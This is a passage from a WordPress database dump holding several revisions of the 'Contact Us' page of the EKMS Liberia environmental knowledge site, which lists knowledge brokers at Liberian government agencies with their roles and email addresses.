src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"knowledge_broker_KT\" alt=\"knowledge_broker_KT\" />											\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement, EPA<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA, EPA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-16 03:31:02','2019-11-16 03:31:02','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2414,1,'2019-11-16 03:31:32','2019-11-16 03:31:32','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />								</a>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />								</a>\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"knowledge_broker_BJ\" alt=\"knowledge_broker_BJ\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer, EPA<br>\nUNCBD Focal Point<br>\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong><br>\nMEAs Coordinator, EPA<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator, EPA<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"knowledge_broker_JJ\" alt=\"knowledge_broker_JJ\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"knowledge_broker_KT\" alt=\"knowledge_broker_KT\" />											\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement, EPA<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA, EPA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-16 03:31:32','2019-11-16 03:31:32','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2415,1,'2019-11-16 03:32:06','2019-11-16 03:32:06','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />								</a>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />								</a>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"knowledge_broker_BJ\" alt=\"knowledge_broker_BJ\" />								</a>\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer, EPA<br>\nUNCBD Focal Point<br>\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong><br>\nMEAs Coordinator, EPA<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator, EPA<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"knowledge_broker_JJ\" alt=\"knowledge_broker_JJ\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"knowledge_broker_KT\" alt=\"knowledge_broker_KT\" />											\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement, EPA<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA, EPA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-16 03:32:06','2019-11-16 03:32:06','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2416,1,'2019-11-16 03:33:53','2019-11-16 03:33:53','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />								</a>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />								</a>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"knowledge_broker_BJ\" alt=\"knowledge_broker_BJ\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer, EPA<br>\nUNCBD Focal Point<br>\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong><br>\nMEAs Coordinator, EPA<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"knowledge_broker_JJ\" alt=\"knowledge_broker_JJ\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"knowledge_broker_KT\" alt=\"knowledge_broker_KT\" />											\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement, EPA<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA, EPA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-16 03:33:53','2019-11-16 03:33:53','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2417,1,'2019-11-16 03:35:29','2019-11-16 03:35:29','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"knowledge_broker_BJ\" alt=\"knowledge_broker_BJ\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer, EPA<br>\nUNCBD Focal Point<br>\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong><br>\nMEAs Coordinator, EPA<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"knowledge_broker_JJ\" alt=\"knowledge_broker_JJ\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"knowledge_broker_KT\" alt=\"knowledge_broker_KT\" />											\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement, EPA<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA, EPA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-16 03:35:29','2019-11-16 03:35:29','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2419,1,'2019-11-16 03:42:31','2019-11-16 03:42:31','Mr. <strong>John K. Jallah</strong> is a staff at the Environmental Protection Agency. He is the Manager of the Compliance and Enforcement Department.','John K. Jallah','','publish','closed','closed','','john-k-jallah','','','2019-11-16 03:55:58','2019-11-16 03:55:58','',0,'https://ekmsliberia.info/?post_type=knowledge_broker&#038;p=2419',2,'knowledge_broker','',0),(2420,1,'2019-11-16 03:54:52','2019-11-16 03:54:52','Mr. <strong>Kawusu Toure</strong> is a staff at the Environmental Protection Agency. He is the Assistant Manager of the Environment Social Impact Assessment Unit, Compliance and Enforcement Department.','Kawusu Toure','','publish','closed','closed','','kawusu-toure','','','2019-11-16 03:54:52','2019-11-16 03:54:52','',0,'https://ekmsliberia.info/?post_type=knowledge_broker&#038;p=2420',1,'knowledge_broker','',0),(2421,1,'2019-11-16 03:56:47','2019-11-16 03:56:47','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption>John K. Jallah</figcaption>\n										</figure>\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />											\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement, EPA<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA, EPA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-16 03:56:47','2019-11-16 03:56:47','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2422,1,'2019-11-16 03:57:31','2019-11-16 03:57:31','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							